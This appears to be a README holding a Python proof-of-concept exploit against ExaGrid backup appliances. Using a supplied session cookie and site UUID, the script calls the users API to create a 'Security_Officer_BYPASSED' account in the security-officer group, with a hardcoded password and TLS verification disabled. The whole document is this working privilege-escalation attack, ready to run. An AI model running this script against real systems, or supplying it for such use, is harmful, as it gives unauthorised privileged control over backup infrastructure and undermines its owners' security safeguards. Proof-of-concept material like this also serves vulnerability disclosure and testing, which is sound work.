README.md
Rendering markdown...
import requests
import argparse
# For this PoC, the person running is responsible for obtaining the JSESSIONIDSSO cookie and the UUID of the ExaGrid. This can all be done programmatically as well.
def create_security_officer(url, cookie, uuid, debug=False):
session = requests.session()
api_url = f"https://{url}:443/api/v1/sites/{uuid}/users"
cookies = {"JSESSIONIDSSO": cookie}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/json",
"Origin": f"https://{url}",
"Referer": f"https://{url}/client/hub/{uuid}/security/a_local_users",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Priority": "u=0",
"Te": "trailers",
"Connection": "keep-alive"
}
payload = {
"description": "Security Officer Bypass",
"enabled": True,
"group": "exagrid-sec-offs", # Group Name
"name": "Security_Officer_BYPASSED",
"password": "XTNhXmJeKHo/P0hdTSY=", # Base64 Encoded Password!
"passwordChange": False,
"siteUuid": uuid
}
response = session.post(api_url, headers=headers, cookies=cookies, json=payload, verify=False)
if response.status_code in [200, 201]:
print("[+] Security Officer Created!")
else:
print("[-] Error, used debug mode to learn more.")
if debug:
print(f"Raw Response: {response.text}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Create a Security Officer user.")
parser.add_argument("--url", required=True, help="The base URL (strip https if supplied)")
parser.add_argument("--cookie", required=True, help="The session cookie value")
parser.add_argument("--uuid", required=True, help="The site UUID")
parser.add_argument("--debug", action="store_true", help="Enable debug mode to print raw responses")
args = parser.parse_args()
create_security_officer(args.url, args.cookie, args.uuid, args.debug)